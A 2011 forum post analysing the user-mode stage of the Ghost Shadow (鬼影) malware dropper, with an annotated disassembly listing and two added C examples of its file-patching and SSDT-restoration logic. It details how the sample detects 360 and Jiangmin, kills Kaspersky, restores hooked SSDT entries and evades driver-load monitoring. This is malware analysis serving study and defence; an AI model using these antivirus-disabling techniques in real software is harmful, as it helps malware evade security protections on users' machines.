Title: [Request for featured post] Partial analysis of the 鬼影 (Ghost Shadow) mother body, R3 part
Author: 苏
Time: 2011-03-30,16:40:30
Link: http://bbs.pediy.com/showthread.php?t=131317
This is a virus that made quite a stir a while ago.
Some of the techniques used in it are very good,
so I am presenting an analysis here to share with everyone.
No more chatter, straight to the analysis.
First a big OD dump, to give everyone a feel for the flow.
Code:
00404612 >/$ 55             push ebp
00404613 |.  8BEC           mov ebp, esp
00404615 |.  81EC 580A0000  sub esp, 0A58
0040461B |.  53             push ebx
0040461C |.  56             push esi
0040461D |.  57             push edi
0040461E |.  6A 1D          push 1D
00404620 |.  33DB           xor ebx, ebx
00404622 |.  59             pop ecx
00404623 |.  33C0           xor eax, eax
00404625 |.  8DBD 4DFFFFFF  lea edi, dword ptr [ebp-B3]
0040462B |.  889D 4CFFFFFF  mov byte ptr [ebp-B4], bl
00404631 |.  6A 1D          push 1D
00404633 |.  F3:AB          rep stos dword ptr es:[edi]            ; zero the path buffer at [ebp-B4]
00404635 |.  66:AB          stos word ptr es:[edi]
00404637 |.  AA             stos byte ptr es:[edi]
00404638 |.  59             pop ecx
00404639 |.  33C0           xor eax, eax
0040463B |.  8DBD D1FDFFFF  lea edi, dword ptr [ebp-22F]
00404641 |.  889D D0FDFFFF  mov byte ptr [ebp-230], bl
00404647 |.  F3:AB          rep stos dword ptr es:[edi]            ; zero the second path buffer at [ebp-230]
00404649 |.  66:AB          stos word ptr es:[edi]
0040464B |.  AA             stos byte ptr es:[edi]
0040464C |.  E8 21F0FFFF    call 00403672                          ; load function library
00404651 |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
00404657 |.  50             push eax
00404658 |.  E8 75FCFFFF    call 004042D2                          ; get the system directory and build the string
0040465D |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
00404663 |.  C70424 607740> mov dword ptr [esp], 00407760
0040466A |.  50             push eax
0040466B |.  FF15 78774000  call dword ptr [407778]                ; indirect call through a pointer resolved at runtime
00404671 |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
00404677 |.  50             push eax
00404678 |.  FF15 74774000  call dword ptr [407774]
0040467E |.  83C4 0C        add esp, 0C
00404681 |.  8BF0           mov esi, eax                           ; esi = result, used below as the length of the base path
00404683 |.  8D85 B4F8FFFF  lea eax, dword ptr [ebp-74C]
00404689 |.  68 04010000    push 104                               ; /BufSize = 104 (260.)
0040468E |.  50             push eax                               ; |PathBuffer
0040468F |.  53             push ebx                               ; |hModule
00404690 |.  FF15 6C604000  call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404696 |.  8D85 B8F9FFFF  lea eax, dword ptr [ebp-648]
0040469C |.  C785 B8F9FFFF> mov dword ptr [ebp-648], 94            ; OSVERSIONINFOA.dwOSVersionInfoSize
004046A6 |.  50             push eax                               ; /pVersionInformation
004046A7 |.  FF15 E4604000  call dword ptr [<&KERNEL32.GetVersion>; \GetVersionExA
004046AD |.  83BD BCF9FFFF> cmp dword ptr [ebp-644], 5             ; check OS version: dwMajorVersion must be 5
004046B4 |.  74 05          je short 004046BB
004046B6 |.  E8 42CBFFFF    call 004011FD                          ; otherwise bail out
004046BB |>  83BD C0F9FFFF> cmp dword ptr [ebp-640], 1             ; dwMinorVersion must be 1, i.e. only XP is infected
004046C2 |.  74 05          je short 004046C9
004046C4 |.  E8 34CBFFFF    call 004011FD
004046C9 |>  68 50774000    push 00407750                          ; /MutexName = "Q360MonMutex"
004046CE |.  53             push ebx                               ; |InitialOwner
004046CF |.  53             push ebx                               ; |pSecurity
004046D0 |.  FF15 E0604000  call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
004046D6 |.  FF15 58604000  call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004046DC |.  3D B7000000    cmp eax, 0B7                           ; detect 360: ERROR_ALREADY_EXISTS means 360 is running
004046E1 |.  74 34          je short 00404717                      ; 360 present: skip the SSDT restore and AV killing below
004046E3 |.  6A 01          push 1
004046E5 |.  E8 27D5FFFF    call 00401C11                          ; restore SSDT
004046EA |.  59             pop ecx
004046EB |.  E8 E1CDFFFF    call 004014D1                          ; nop
004046F0 |> E8 A7E0FFFF    /call 0040279C                          ; kill Kaspersky
004046F5 |.  85C0           |test eax, eax
004046F7 |.  74 0D          |je short 00404706
004046F9 |.  68 E8030000    |push 3E8                              ; /Timeout = 1000. ms
004046FE |.  FF15 BC604000  |call dword ptr [<&KERNEL32.Sleep>]    ; \Sleep
00404704 |.^ EB EA          \jmp short 004046F0                    ; retry every second until the kill succeeds
00404706 |>  6A 01          push 1
00404708 |.  6A 02          push 2
0040470A |.  68 931A4000    push 00401A93
0040470F |.  E8 CECEFFFF    call 004015E2                          ; fight other AV products
00404714 |.  83C4 0C        add esp, 0C
00404717 |>  68 F4010000    push 1F4                               ; /Timeout = 500. ms
0040471C |.  FF15 BC604000  call dword ptr [<&KERNEL32.Sleep>]     ; \Sleep
00404722 |.  E8 3CFCFFFF    call 00404363                          ; drop the .sys and .ini files
00404727 |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
0040472D |.  50             push eax
0040472E |.  8D85 4CFFFFFF  lea eax, dword ptr [ebp-B4]
00404734 |.  50             push eax
00404735 |.  FF15 70774000  call dword ptr [407770]                ; [ebp-B4] <- base path
0040473B |.  59             pop ecx
0040473C |.  C68435 4CFFFF> mov byte ptr [ebp+esi-B4], 30
00404744 |.  59             pop ecx
00404745 |.  C68435 4DFFFF> mov byte ptr [ebp+esi-B3], 30
0040474D |.  C68435 4EFFFF> mov byte ptr [ebp+esi-B2], 30          ; append "000000000" (nine 0x30 bytes) to the path: the file to open
00404755 |.  53             push ebx                               ; /hTemplateFile
00404756 |.  C68435 4FFFFF> mov byte ptr [ebp+esi-B1], 30          ; |
0040475E |.  68 80000000    push 80                                ; |Attributes = NORMAL
00404763 |.  C68435 50FFFF> mov byte ptr [ebp+esi-B0], 30          ; |
0040476B |.  6A 03          push 3                                 ; |Mode = OPEN_EXISTING
0040476D |.  C68435 51FFFF> mov byte ptr [ebp+esi-AF], 30          ; |
00404775 |.  53             push ebx                               ; |pSecurity
00404776 |.  C68435 52FFFF> mov byte ptr [ebp+esi-AE], 30          ; |
0040477E |.  6A 03          push 3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00404780 |.  8D85 4CFFFFFF  lea eax, dword ptr [ebp-B4]            ; |
00404786 |.  C68435 53FFFF> mov byte ptr [ebp+esi-AD], 30          ; |
0040478E |.  68 000000C0    push C0000000                          ; |Access = GENERIC_READ|GENERIC_WRITE
00404793 |.  C68435 54FFFF> mov byte ptr [ebp+esi-AC], 30          ; |
0040479B |.  50             push eax                               ; |FileName
0040479C |.  889C35 55FFFF> mov byte ptr [ebp+esi-AB], bl          ; | terminating NUL
004047A3 |.  FF15 04614000  call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004047A9 |.  8BF8           mov edi, eax
004047AB |.  83FF FF        cmp edi, -1                            ; INVALID_HANDLE_VALUE
004047AE |.  897D FC        mov dword ptr [ebp-4], edi
004047B1 |.  75 05          jnz short 004047B8
004047B3 |.  E8 45CAFFFF    call 004011FD                          ; open failed: bail out
004047B8 |>  53             push ebx                               ; /pFileSizeHigh
004047B9 |.  57             push edi                               ; |hFile
004047BA |.  FF15 FC604000  call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
004047C0 |.  6A 40          push 40                                ; /Protect = PAGE_EXECUTE_READWRITE
004047C2 |.  68 00100000    push 1000                              ; |AllocationType = MEM_COMMIT
004047C7 |.  50             push eax                               ; |Size
004047C8 |.  53             push ebx                               ; |Address
004047C9 |.  8945 F8        mov dword ptr [ebp-8], eax             ; |
004047CC |.  895D F0        mov dword ptr [ebp-10], ebx            ; |
004047CF |.  8945 E8        mov dword ptr [ebp-18], eax            ; | [ebp-18] = file size
004047D2 |.  FF15 24614000  call dword ptr [<&KERNEL32.VirtualAll>; \VirtualAlloc
004047D8 |.  8BF0           mov esi, eax                           ; esi = buffer holding the whole file
004047DA |.  8D45 F0        lea eax, dword ptr [ebp-10]
004047DD |.  53             push ebx                               ; /pOverlapped
004047DE |.  50             push eax                               ; |pBytesRead
004047DF |.  FF75 F8        push dword ptr [ebp-8]                 ; |BytesToRead
004047E2 |.  56             push esi                               ; |Buffer
004047E3 |.  57             push edi                               ; |hFile
004047E4 |.  FF15 0C614000  call dword ptr [<&KERNEL32.ReadFile>]  ; \ReadFile
004047EA |.  8B4D F8        mov ecx, dword ptr [ebp-8]
004047ED |.  8BC6           mov eax, esi
004047EF |.  03CE           add ecx, esi                           ; ecx = end of buffer
004047F1 |.  3BF1           cmp esi, ecx
004047F3 |.  73 0D          jnb short 00404802
004047F5 |> 8138 76620D78  /cmp dword ptr [eax], 780D6276          ; scan the file byte by byte for the marker DWORD 780D6276
004047FB |.  74 05          |je short 00404802
004047FD |.  40             |inc eax
004047FE |.  3BC1           |cmp eax, ecx
00404800 |.^ 72 F3          \jb short 004047F5                     ; no "not found" check: eax == end of buffer falls through
00404802 |>  68 48010000    push 148
00404807 |.  68 94744000    push 00407494
0040480C |.  50             push eax
0040480D |.  FF15 7C774000  call dword ptr [40777C]                ; call(marker location, 00407494, 148)
00404813 |.  8B46 3C        mov eax, dword ptr [esi+3C]            ; e_lfanew of the file just read
00404816 |.  83C4 0C        add esp, 0C
00404819 |.  05 50010000    add eax, 150                           ; e_lfanew+150: for a PE32 with a 0xE0 optional header this is section[2]+8
0040481E |.  8945 F0        mov dword ptr [ebp-10], eax
00404821 |.  03C6           add eax, esi
00404823 |.  53             push ebx
00404824 |.  8B48 0C        mov ecx, dword ptr [eax+C]             ; section[2].PointerToRawData
00404827 |.  894D F8        mov dword ptr [ebp-8], ecx
0040482A |.  8B40 08        mov eax, dword ptr [eax+8]             ; section[2].SizeOfRawData
0040482D |.  8945 F0        mov dword ptr [ebp-10], eax
00404830 |.  50             push eax
00404831 |.  8D040E         lea eax, dword ptr [esi+ecx]
00404834 |.  50             push eax
00404835 |.  E8 FCF9FFFF    call 00404236                          ; call(raw data of section[2], SizeOfRawData, 0)
0040483A |.  53             push ebx                               ; /Origin
0040483B |.  53             push ebx                               ; |pOffsetHi
0040483C |.  53             push ebx                               ; |OffsetLo
0040483D |.  57             push edi                               ; |hFile
0040483E |.  8B3D 08614000  mov edi, dword ptr [<&KERNEL32.SetFi>  ; |kernel32.SetFilePointer
00404844 |.  FFD7           call edi                               ; \SetFilePointer: rewind to offset 0
00404846 |.  8D45 F0        lea eax, dword ptr [ebp-10]
00404849 |.  53             push ebx                               ; /pOverlapped
0040484A |.  50             push eax                               ; |pBytesWritten
0040484B |.  FF75 E8        push dword ptr [ebp-18]                ; |nBytesToWrite = file size
0040484E |.  56             push esi                               ; |Buffer
0040484F |.  FF75 FC        push dword ptr [ebp-4]                 ; |hFile
00404852 |.  FF15 00614000  call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile: write the modified image back in place
00404858 |.  68 00400000    push 4000                              ; /FreeType = MEM_DECOMMIT
0040485D |.  FF75 E8        push dword ptr [ebp-18]                ; |Size
00404860 |.  56             push esi                               ; |Address
00404861 |.  FF15 1C614000  call dword ptr [<&KERNEL32.VirtualFre>; \VirtualFree
00404867 |.  FF75 FC        push dword ptr [ebp-4]                 ; /hObject
0040486A |.  FF15 14614000  call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00404870 |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
00404876 |.  50             push eax
00404877 |.  8D85 D0FDFFFF  lea eax, dword ptr [ebp-230]
0040487D |.  50             push eax
0040487E |.  FF15 70774000  call dword ptr [407770]                ; [ebp-230] <- base path
00404884 |.  8D85 D0FDFFFF  lea eax, dword ptr [ebp-230]
0040488A |.  50             push eax
0040488B |.  FF15 74774000  call dword ptr [407774]
00404891 |.  8BF0           mov esi, eax                           ; esi = length of the base path
00404893 |.  83C4 0C        add esp, 0C
00404896 |.  8D85 D0FDFFFF  lea eax, dword ptr [ebp-230]
0040489C |.  C68435 D0FDFF> mov byte ptr [ebp+esi-230], 30
004048A4 |.  C68435 D1FDFF> mov byte ptr [ebp+esi-22F], 30
004048AC |.  C68435 D2FDFF> mov byte ptr [ebp+esi-22E], 30
004048B4 |.  C68435 D3FDFF> mov byte ptr [ebp+esi-22D], 30
004048BC |.  C68435 D4FDFF> mov byte ptr [ebp+esi-22C], 30         ; copy to a new file: name is base path + "000000001"
004048C4 |.  53             push ebx                               ; /FailIfExists
004048C5 |.  C68435 D5FDFF> mov byte ptr [ebp+esi-22B], 30         ; |
004048CD |.  50             push eax                               ; |NewFileName
004048CE |.  C68435 D6FDFF> mov byte ptr [ebp+esi-22A], 30         ; |
004048D6 |.  8D85 4CFFFFFF  lea eax, dword ptr [ebp-B4]            ; |
004048DC |.  C68435 D7FDFF> mov byte ptr [ebp+esi-229], 30         ; |
004048E4 |.  C68435 D8FDFF> mov byte ptr [ebp+esi-228], 31         ; | last digit is '1'
004048EC |.  50             push eax                               ; |ExistingFileName = the "000000000" file patched above
004048ED |.  889C35 D9FDFF> mov byte ptr [ebp+esi-227], bl         ; |
004048F4 |.  FF15 D0604000  call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004048FA |.  8D85 54FCFFFF  lea eax, dword ptr [ebp-3AC]
00404900 |.  50             push eax
00404901 |.  8D85 4CFFFFFF  lea eax, dword ptr [ebp-B4]
00404907 |.  50             push eax
00404908 |.  FF15 70774000  call dword ptr [407770]                ; [ebp-B4] <- base path again
0040490E |.  C68435 4CFFFF> mov byte ptr [ebp+esi-B4], 61          ; append "atixi.sys" byte by byte
00404916 |.  C68435 4DFFFF> mov byte ptr [ebp+esi-B3], 74
0040491E |.  C68435 4EFFFF> mov byte ptr [ebp+esi-B2], 69
00404926 |.  C68435 4FFFFF> mov byte ptr [ebp+esi-B1], 78
0040492E |.  C68435 50FFFF> mov byte ptr [ebp+esi-B0], 69
00404936 |.  59             pop ecx
00404937 |.  C68435 51FFFF> mov byte ptr [ebp+esi-AF], 2E
0040493F |.  C68435 52FFFF> mov byte ptr [ebp+esi-AE], 73
00404947 |.  59             pop ecx
00404948 |.  C68435 53FFFF> mov byte ptr [ebp+esi-AD], 79
00404950 |.  C68435 54FFFF> mov byte ptr [ebp+esi-AC], 73
00404958 |.  889C35 55FFFF> mov byte ptr [ebp+esi-AB], bl
0040495F |.  68 34774000    push 00407734                          ; /EventName = "Jiangmin_WallNotify_Notify"
00404964 |.  53             push ebx                               ; |InitiallySignaled
00404965 |.  53             push ebx                               ; |ManualReset
00404966 |.  53             push ebx                               ; |pSecurity
00404967 |.  FF15 B0604000  call dword ptr [<&KERNEL32.CreateEven>; \CreateEventA
0040496D |.  FF15 58604000  call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00404973 |.  3D B7000000    cmp eax, 0B7                           ; ERROR_ALREADY_EXISTS
00404978 |.  0F85 0F020000  jnz 00404B8D                           ; check whether Jiangmin is present
0040497E |.  B9 81000000    mov ecx, 81                            ; what follows bypasses Jiangmin's active defense
00404983 |.  33C0           xor eax, eax
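The file-patching step in the listing above (004047EA to 00404835) is easy to misread because of the bare 0x150 constant. The following is an added example, not code from the original post or from the sample: it re-implements the two steps over a constructed PE32 image so the offsets can be checked. The marker value 0x780D6276 and the 0x150 offset come from the listing; the section layout and the contents of the sample image are invented for the demo, and the validation in `third_section_raw` is something the sample does not do.

```c
/*
 * Added example (not from the original post or the sample): the file walk the
 * dropper performs after ReadFile, over a constructed PE32 image.
 *   1. scan the buffer byte by byte for the DWORD 0x780D6276 (004047F5);
 *   2. take e_lfanew, add 0x150, read the DWORDs at +8 and +0xC (00404813-0040482A).
 * Constants from the listing: MARKER, 0x150. Everything else is assumed here.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MARKER         0x780D6276u  /* value compared at 004047F5 */
#define PE32_OPT_SIZE  0xE0u        /* sizeof(IMAGE_OPTIONAL_HEADER32) */
#define SECTION_SIZE   0x28u        /* sizeof(IMAGE_SECTION_HEADER) */

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Step 1, same semantics as the loop at 004047F5: an unaligned DWORD compare
 * at every byte offset. Returns len when the marker is absent; the sample
 * never checks for that and carries on with eax == end of buffer. */
size_t find_marker(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i + 4 <= len; i++)
        if (rd32(buf + i) == MARKER) return i;
    return len;
}

struct raw_section { uint32_t pointer_to_raw; uint32_t size_of_raw; };

/* Step 2. With the standard 0xE0-byte optional header the section table
 * starts at e_lfanew + 4 + 0x14 + 0xE0 = e_lfanew + 0xF8, so
 * e_lfanew + 0x150 = e_lfanew + 0xF8 + 2*0x28 + 8 is section[2] + 8.
 * The DWORDs at +8 and +0xC are then SizeOfRawData (header + 0x10) and
 * PointerToRawData (header + 0x14) of the third section. Unlike the
 * sample, validate the headers before trusting that shortcut. */
int third_section_raw(const uint8_t *buf, size_t len, struct raw_section *out) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;
    uint32_t pe = rd32(buf + 0x3C);                          /* e_lfanew */
    if (pe > len - 0x18 || memcmp(buf + pe, "PE\0\0", 4) != 0) return -1;
    uint16_t nsec  = (uint16_t)(buf[pe + 6] | buf[pe + 7] << 8);         /* NumberOfSections */
    uint16_t optsz = (uint16_t)(buf[pe + 0x14] | buf[pe + 0x15] << 8);   /* SizeOfOptionalHeader */
    if (nsec < 3 || optsz != PE32_OPT_SIZE) return -1;       /* 0x150 only lands on section[2] then */
    uint32_t p = pe + 0x150;
    if (p + 0x10 > len) return -1;
    out->size_of_raw    = rd32(buf + p + 0x8);
    out->pointer_to_raw = rd32(buf + p + 0xC);
    if (out->pointer_to_raw > len || out->size_of_raw > len - out->pointer_to_raw) return -1;
    return 0;
}

#define IMG_SIZE 0x800
#define E_LFANEW 0x80

/* Constructed sample image (assumed layout): three sections, the third with
 * raw data at 0x600..0x800, and the marker planted inside it at 0x650. */
size_t build_sample_image(uint8_t *buf, size_t cap) {
    if (cap < IMG_SIZE) return 0;
    memset(buf, 0, IMG_SIZE);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, E_LFANEW);
    memcpy(buf + E_LFANEW, "PE\0\0", 4);
    wr16(buf + E_LFANEW + 4, 0x014C);            /* IMAGE_FILE_MACHINE_I386 */
    wr16(buf + E_LFANEW + 6, 3);                 /* NumberOfSections */
    wr16(buf + E_LFANEW + 0x14, PE32_OPT_SIZE);  /* SizeOfOptionalHeader */
    wr16(buf + E_LFANEW + 0x18, 0x10B);          /* PE32 magic */
    const char *names[3] = { ".text", ".rdata", ".data" };
    const uint32_t raw[3] = { 0x200, 0x400, 0x600 };
    for (int i = 0; i < 3; i++) {
        uint8_t *sh = buf + E_LFANEW + 4 + 0x14 + PE32_OPT_SIZE + i * SECTION_SIZE;
        memcpy(sh, names[i], strlen(names[i]));
        wr32(sh + 0x08, 0x200);                  /* VirtualSize */
        wr32(sh + 0x0C, 0x1000u * (i + 1));      /* VirtualAddress */
        wr32(sh + 0x10, 0x200);                  /* SizeOfRawData */
        wr32(sh + 0x14, raw[i]);                 /* PointerToRawData */
    }
    wr32(buf + 0x650, MARKER);
    return IMG_SIZE;
}

struct pe_demo { uint32_t marker_off; uint32_t raw_ptr; uint32_t raw_size; int ok; };

/* Run both steps over the constructed image. */
struct pe_demo run_pe_demo(void) {
    static uint8_t img[IMG_SIZE];
    struct pe_demo r = { 0, 0, 0, 0 };
    struct raw_section s;
    size_t n = build_sample_image(img, sizeof img);
    r.marker_off = (uint32_t)find_marker(img, n);
    if (third_section_raw(img, n, &s) == 0) {
        r.raw_ptr = s.pointer_to_raw; r.raw_size = s.size_of_raw; r.ok = 1;
    }
    return r;
}

int main(void) {
    struct pe_demo r = run_pe_demo();
    printf("marker at 0x%X, section[2] raw data 0x%X..0x%X (ok=%d)\n",
           r.marker_off, r.raw_ptr, r.raw_ptr + r.raw_size, r.ok);
    return r.ok ? 0 : 1;
}
```

On the constructed image the marker is found at 0x650 and the third section's raw data is reported as 0x600..0x800, which is the region the sample then hands to 00404236 together with its length before writing the whole buffer back to the file.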
1. The virus first checks the OS version and only infects a specific Windows release (the GetVersionExA check above requires major version 5 and minor version 1, i.e. Windows XP), and it makes sure only one image of itself is in memory.
2. It first raises its process privileges, then uses NtQuerySystemInformation to get the real on-disk file name of ntoskrnl, then, through the SSDT exported by that file, reads out the original SSDT contents and writes them straight into physical memory with ZwSystemDebugControl, thereby restoring the SSDT. The same technique is then used to restore
PsSetLoadImageNotifyRoutine
PsSetCreateProcessNotifyRoutine
PsSetCreateThreadNotifyRoutine
These three functions are too long to excerpt from OD; see the comments in the IDA database for details.
3. The virus enumerates processes looking for the Kaspersky process and then wrecks it.
4. The virus drops the driver, the driver's configuration file and the trojan downloader into the directory
C:\Program files\MSDN\
5. It uses the named-object creation trick (the listing above creates the event "Jiangmin_WallNotify_Notify" with CreateEventA and checks GetLastError for ERROR_ALREADY_EXISTS, 0xB7) to determine whether Jiangmin antivirus is installed; if it is, it bypasses Jiangmin's active defense.
6. The virus then loads its driver through the hardware-driver type of loading to evade the active defense's monitoring of driver loads.
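Point 2 is the core of the R3 part: the original service table is rebuilt from the kernel file on disk and written over the hooked one. The following is an added example and is not the author's C rewrite from the attachment or any code from the sample; it shows only the table arithmetic, run over constructed arrays in user space. All bases, sizes and table contents are invented for the demo. What it does not show (and the sample does) is locating KiServiceTable inside the file: take the RVA of the exported KeServiceDescriptorTable, read the first DWORD there (ServiceTableBase, an absolute VA) and map it to a file offset through the section headers; and the actual write, which the sample does through ZwSystemDebugControl physical-memory access, an interface that later Windows versions closed off, which is one reason the XP-only check matters.

```c
/*
 * Added example (not from the original post or the sample): restoring an
 * SSDT from the on-disk kernel image, reduced to the parts that run anywhere.
 * Addresses, sizes and table contents below are made up for the demo.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

struct kernel_image {
    uint32_t disk_base;   /* ImageBase from the optional header of the file on disk */
    uint32_t live_base;   /* base the running kernel was actually loaded at */
    uint32_t live_size;   /* SizeOfImage, bounds the "inside the kernel" check */
};

/* KiServiceTable in the file holds absolute VAs based on the file's ImageBase
 * (each one has a base relocation). At runtime the entry must hold the same
 * VA rebased to the live load address. */
uint32_t relocate_entry(const struct kernel_image *k, uint32_t disk_va) {
    return disk_va - k->disk_base + k->live_base;
}

int points_into_kernel(const struct kernel_image *k, uint32_t va) {
    return va >= k->live_base && va - k->live_base < k->live_size;
}

struct ssdt_hook { unsigned index; uint32_t current; uint32_t original; };

/* Compare the live table with the relocated on-disk table. Returns the number
 * of entries that differ (hooks); up to cap of them are written to out. */
size_t find_ssdt_hooks(const struct kernel_image *k, const uint32_t *live, const uint32_t *disk,
                       size_t n, struct ssdt_hook *out, size_t cap) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t orig = relocate_entry(k, disk[i]);
        if (live[i] == orig) continue;
        if (found < cap) { out[found].index = (unsigned)i; out[found].current = live[i]; out[found].original = orig; }
        found++;
    }
    return found;
}

/* Write the originals back. The store into the array stands in for the
 * physical-memory write the sample does with ZwSystemDebugControl. A
 * recomputed value outside the live kernel image means the file was misparsed
 * or the wrong ImageBase was used, so refuse it. This check cannot tell
 * ntoskrnl.exe from ntkrnlpa.exe (both rebase into range), which is why the
 * sample asks NtQuerySystemInformation for the loaded kernel's real name. */
size_t restore_ssdt_hooks(const struct kernel_image *k, uint32_t *live,
                          const struct ssdt_hook *hooks, size_t count) {
    size_t restored = 0;
    for (size_t i = 0; i < count; i++) {
        if (!points_into_kernel(k, hooks[i].original)) continue;
        live[hooks[i].index] = hooks[i].original;
        restored++;
    }
    return restored;
}

struct ssdt_demo {
    size_t hooks_found; size_t restored; unsigned hooked_index;
    uint32_t value_after; int all_in_kernel; int bogus_refused;
};

/* Constructed scenario: six service entries, kernel linked at 0x00400000 and
 * loaded at 0x804D7000, entry 3 diverted to an address inside some driver. */
struct ssdt_demo run_ssdt_demo(void) {
    struct kernel_image k = { 0x00400000u, 0x804D7000u, 0x00200000u };
    const uint32_t disk[6] = { 0x0040A100, 0x0040A240, 0x0040B010, 0x0040C3F0, 0x0040D000, 0x0040E8C0 };
    uint32_t live[6];
    struct ssdt_hook hooks[6];
    struct ssdt_demo r = { 0, 0, 0, 0, 1, 0 };
    for (size_t i = 0; i < 6; i++) live[i] = relocate_entry(&k, disk[i]);
    live[3] = 0xF8A0C120u;                       /* the hook: not inside the kernel image */
    r.hooks_found  = find_ssdt_hooks(&k, live, disk, 6, hooks, 6);
    r.hooked_index = r.hooks_found ? hooks[0].index : 0;
    r.restored     = restore_ssdt_hooks(&k, live, hooks, r.hooks_found);
    r.value_after  = live[3];
    for (size_t i = 0; i < 6; i++) if (!points_into_kernel(&k, live[i])) r.all_in_kernel = 0;
    /* a bogus "original" (wrong base / misparsed file) must not be written */
    struct ssdt_hook bogus = { 0, live[0], 0x12345678u };
    r.bogus_refused = restore_ssdt_hooks(&k, live, &bogus, 1) == 0 && live[0] == relocate_entry(&k, disk[0]);
    return r;
}

int main(void) {
    struct ssdt_demo r = run_ssdt_demo();
    printf("hooks=%zu at index %u, restored=%zu, entry now 0x%08X, all in kernel=%d, bogus refused=%d\n",
           r.hooks_found, r.hooked_index, r.restored, r.value_after, r.all_in_kernel, r.bogus_refused);
    return r.all_in_kernel && r.bogus_refused ? 0 : 1;
}
```

In the demo exactly one entry (index 3) differs from the rebased on-disk value, it is restored to 0x804E33F0, every entry then points back into the kernel image, and a made-up "original" outside the image is refused. The same comparison is also what a defender runs in the other direction: an entry that fails `points_into_kernel` is the hook the sample is removing, and the AV product's own driver is what it pointed at.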
The physical-memory read/write part made my head spin, so I rewrote it in C; see the attachment.
Capturing each behavior one by one in OD is a hassle,
so I am just putting the IDB up; everyone can follow along with it.
In a few days I will post the analysis of the driver part.